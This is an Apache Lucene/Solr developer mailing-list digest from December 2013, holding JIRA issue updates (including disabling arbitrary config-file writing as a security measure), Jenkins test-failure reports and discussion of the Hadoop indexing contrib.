For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Resolved] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Erick Erickson (JIRA)


 [ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Erick Erickson resolved SOLR-5518.
--

   Resolution: Fixed
Fix Version/s: 4.7
   5.0

Will remove from 4.7 Real Soon Now.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 is a 
> security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837235#comment-13837235
 ] 

ASF subversion and git services commented on SOLR-5518:
---

Commit 1547261 from [~erickoerickson] in branch 'dev/branches/branch_4x'
[ https://svn.apache.org/r1547261 ]

SOLR-5518: Move editing files to a separte request handler

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 is a 
> security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837168#comment-13837168
 ] 

ASF subversion and git services commented on SOLR-5518:
---

Commit 1547251 from [~erickoerickson] in branch 'dev/trunk'
[ https://svn.apache.org/r1547251 ]

SOLR-5518: Move editing files to a separte request handler

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 is a 
> security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[JENKINS] Lucene-Solr-Tests-trunk-Java7 - Build # 4515 - Still Failing

2013-12-02 Thread Apache Jenkins Server

Build: https://builds.apache.org/job/Lucene-Solr-Tests-trunk-Java7/4515/

All tests passed

Build Log:
[...truncated 58605 lines...]
BUILD FAILED
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/build.xml:420:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/build.xml:359:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/extra-targets.xml:87:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Solr-Tests-trunk-Java7/extra-targets.xml:158:
 Source checkout is dirty after running tests!!! Offending files:
* ./solr/licenses/jackson-core-asl-1.7.4.jar.sha1
* ./solr/licenses/jackson-mapper-asl-1.7.4.jar.sha1
* ./solr/licenses/jersey-core-1.16.jar.sha1

Total time: 115 minutes 45 seconds
Build step 'Invoke Ant' marked build as failure
Archiving artifacts
Recording test results
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[JENKINS] Lucene-Solr-trunk-Linux (32bit/jdk1.8.0-ea-b117) - Build # 8549 - Still Failing!

2013-12-02 Thread Policeman Jenkins Server

Build: http://jenkins.thetaphi.de/job/Lucene-Solr-trunk-Linux/8549/
Java: 32bit/jdk1.8.0-ea-b117 -server -XX:+UseSerialGC

3 tests failed.
FAILED:  junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest

Error Message:
1 thread leaked from SUITE scope at 
org.apache.solr.hadoop.MorphlineReducerTest: 1) Thread[id=17, 
name=Thread-4, state=TIMED_WAITING, group=TGRP-MorphlineReducerTest] at 
sun.misc.Unsafe.park(Native Method) at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215) 
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
 at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
 at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)  
   at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)

Stack Trace:
com.carrotsearch.randomizedtesting.ThreadLeakError: 1 thread leaked from SUITE 
scope at org.apache.solr.hadoop.MorphlineReducerTest: 
   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
group=TGRP-MorphlineReducerTest]
at sun.misc.Unsafe.park(Native Method)
at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)
at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
at __randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925]:0)


FAILED:  junit.framework.TestSuite.org.apache.solr.hadoop.MorphlineReducerTest

Error Message:
There are still zombie threads that couldn't be terminated:1) Thread[id=17, 
name=Thread-4, state=TIMED_WAITING, group=TGRP-MorphlineReducerTest] at 
sun.misc.Unsafe.park(Native Method) at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215) 
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
 at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
 at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)  
   at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)

Stack Trace:
com.carrotsearch.randomizedtesting.ThreadLeakError: There are still zombie 
threads that couldn't be terminated:
   1) Thread[id=17, name=Thread-4, state=TIMED_WAITING, 
group=TGRP-MorphlineReducerTest]
at sun.misc.Unsafe.park(Native Method)
at 
java.util.concurrent.locks.LockSupport.parkNanos(LockSupport.java:215)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.doAcquireSharedNanos(AbstractQueuedSynchronizer.java:1037)
at 
java.util.concurrent.locks.AbstractQueuedSynchronizer.tryAcquireSharedNanos(AbstractQueuedSynchronizer.java:1328)
at java.util.concurrent.CountDownLatch.await(CountDownLatch.java:277)
at org.apache.solr.hadoop.HeartBeater.run(HeartBeater.java:108)
at __randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925]:0)


FAILED:  org.apache.solr.hadoop.MorphlineReducerTest.testReducer

Error Message:


Stack Trace:
java.lang.ExceptionInInitializerError
at 
__randomizedtesting.SeedInfo.seed([FA8A1D94A2BB2925:8E2E7A5608ED2865]:0)
at org.apache.solr.core.ConfigSolr.fromInputStream(ConfigSolr.java:85)
at org.apache.solr.core.ConfigSolr.fromFile(ConfigSolr.java:64)
at org.apache.solr.core.ConfigSolr.fromSolrHome(ConfigSolr.java:94)
at org.apache.solr.core.CoreContainer.(CoreContainer.java:132)
at 
org.apache.solr.hadoop.SolrRecordWriter.createEmbeddedSolrServer(SolrRecordWriter.java:162)
at 
org.apache.solr.hadoop.SolrRecordWriter.(SolrRecordWriter.java:118)
at 
org.apache.solr.hadoop.SolrOutputFormat.getRecordWriter(SolrOutputFormat.java:161)
at 
org.apache.hadoop.mrunit.internal.mapreduce.MockMapreduceOutputFormat.collect(MockMapreduceOutputFormat.java:100)
at 
org.apache.hadoop.mrunit.internal.mapreduce.AbstractMockContextWrapper$4.answer(AbstractMockContextWrapper.java:90)
at 
org.mockito.internal.stubbing.StubbedInvocationMatcher.answer(StubbedInvocationMatcher.java:34)
at 
org.mockito.internal.handler.MockHandlerImpl.handle(MockHandlerImpl.java:91)
at 
org.mockito.internal.handler.NullResultGuardian.handle(NullResultGuardian.java:29)
at 
org.mockito.internal.handler.InvocationNotifierHandler.handle(InvocationNotifierHandler.java:38)
at 
org.mockito.internal.creation.MethodInterceptorFilter.intercept(MethodInterceptorFilter.java:51)
at 
org.apache.hadoop.mapreduce.Reducer$Context$$En

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Uwe Schindler (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837110#comment-13837110
 ] 

Uwe Schindler commented on SOLR-1301:
-

OK, I fixed the test suite to pass on Windows.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837090#comment-13837090
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547242 from [~thetaphi] in branch 'dev/trunk'
[ https://svn.apache.org/r1547242 ]

SOLR-1301: Ignore windows tests that cannot work because they use UNIX 
semantics. Also remove a never-executed test which tests nothing

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (LUCENE-5339) Simplify the facet module APIs

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/LUCENE-5339?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837086#comment-13837086
 ] 

ASF subversion and git services commented on LUCENE-5339:
-

Commit 1547241 from [~mikemccand] in branch 'dev/branches/lucene5339'
[ https://svn.apache.org/r1547241 ]

LUCENE-5339: nocommits, javadocs, tests, range drill downs

> Simplify the facet module APIs
> --
>
> Key: LUCENE-5339
> URL: https://issues.apache.org/jira/browse/LUCENE-5339
> Project: Lucene - Core
>  Issue Type: Improvement
>  Components: modules/facet
>Reporter: Michael McCandless
>Assignee: Michael McCandless
> Attachments: LUCENE-5339.patch, LUCENE-5339.patch
>
>
> I'd like to explore simplifications to the facet module's APIs: I
> think the current APIs are complex, and the addition of a new feature
> (sparse faceting, LUCENE-5333) threatens to add even more classes
> (e.g., FacetRequestBuilder).  I think we can do better.
> So, I've been prototyping some drastic changes; this is very
> early/exploratory and I'm not sure where it'll wind up but I think the
> new approach shows promise.
> The big changes are:
>   * Instead of *FacetRequest/Params/Result, you directly instantiate
> the classes that do facet counting (currently TaxonomyFacetCounts,
> RangeFacetCounts or SortedSetDVFacetCounts), passing in the
> SimpleFacetsCollector, and then you interact with those classes to
> pull labels + values (topN under a path, sparse, specific labels).
>   * At index time, no more FacetIndexingParams/CategoryListParams;
> instead, you make a new SimpleFacetFields and pass it the field it
> should store facets + drill downs under.  If you want more than
> one CLI you create more than one instance of SimpleFacetFields.
>   * I added a simple schema, where you state which dimensions are
> hierarchical or multi-valued.  From this we decide how to index
> the ordinals (no more OrdinalPolicy).
> Sparse faceting is just another method (getAllDims), on both taxonomy
> & ssdv facet classes.
> I haven't created a common base class / interface for all of the
> search-time facet classes, but I think this may be possible/clean, and
> perhaps useful for drill sideways.
> All the new classes are under oal.facet.simple.*.
> Lots of things that don't work yet: drill sideways, complements,
> associations, sampling, partitions, etc.  This is just a start ...



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837070#comment-13837070
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547239 from [~thetaphi] in branch 'dev/trunk'
[ https://svn.apache.org/r1547239 ]

SOLR-1301: Fix windows problem with escaping of folder name (see crazy 
https://github.com/typesafehub/config/blob/master/HOCON.md for correct format: 
string must be quoted and escaped like javascript)

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread wolfgang hoschek (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837068#comment-13837068
 ] 

wolfgang hoschek commented on SOLR-1301:


There is also a known issue in that Morphlines don't work on Windows because 
the Guava Classpath utility doesn't work with windows path conventions. For 
example, see 
http://mail-archives.apache.org/mod_mbox/flume-dev/201310.mbox/%3c5acffcd9-4ad7-4e6e-8365-ceadfac78...@cloudera.com%3E

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains  a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When reduce 
> task completes, and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses a custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Created] (SOLR-5523) Implement proper security when writing config files to Solr

2013-12-02 Thread Erick Erickson (JIRA)

Erick Erickson created SOLR-5523:


 Summary: Implement proper security when writing config files to 
Solr
 Key: SOLR-5523
 URL: https://issues.apache.org/jira/browse/SOLR-5523
 Project: Solr
  Issue Type: Bug
Affects Versions: 5.0
Reporter: Erick Erickson
Priority: Blocker


Follow up on SOLR-5518 and SOLR-5287. We need to add proper security for 
writing files to Solr.

I can't pursue this for some time. If we decide to pull this out, we need to 
ust remove EditFileRequestHandler, that should do it.




--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Created] (SOLR-5522) Pull modifying the Solr config documents out of Solr 4.x

2013-12-02 Thread Erick Erickson (JIRA)

Erick Erickson created SOLR-5522:


 Summary: Pull modifying the Solr config documents out of Solr 4.x
 Key: SOLR-5522
 URL: https://issues.apache.org/jira/browse/SOLR-5522
 Project: Solr
  Issue Type: Bug
Affects Versions: 4.7
Reporter: Erick Erickson
Assignee: Erick Erickson
Priority: Blocker


Follow up on SOLR-5518 and SOLR-5287. We need to add proper security to the 
ability to write config files to Solr or there is a security problem.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-788) MoreLikeThis should support distributed search

2013-12-02 Thread Bill Mitchell (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837060#comment-13837060
 ] 

Bill Mitchell commented on SOLR-788:


Suneel Marthi's issue above, where the derivative query passed to the shard is 
invalid, is similar to the issue I documented for numeric keys in SOLR-5521.  
Here, the query terms extracted from the bean for which we are searching for 
similar beans includes terms with embedded colons.  When the MoreLikeThis 
component under the search handler builds a MoreLikeTheseQuery, the extracted 
query terms need to be quoted.  

> MoreLikeThis should support distributed search
> --
>
> Key: SOLR-788
> URL: https://issues.apache.org/jira/browse/SOLR-788
> Project: Solr
>  Issue Type: Improvement
>  Components: MoreLikeThis
>Reporter: Grant Ingersoll
>Assignee: Mark Miller
>Priority: Minor
> Fix For: 4.1, 5.0
>
> Attachments: AlternateDistributedMLT.patch, MLT.patch, MLT.patch, 
> MoreLikeThisComponentTest.patch, SOLR-788.patch, SOLR-788.patch, 
> SolrMoreLikeThisPatch.txt
>
>
> The MoreLikeThis component should support distributed processing.
> See SOLR-303.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread Mark Miller (JIRA)


[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13837049#comment-13837049
 ] 

Mark Miller commented on SOLR-1301:
---

Hmm...yeah, you might as well. I'll investigate on my VM.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
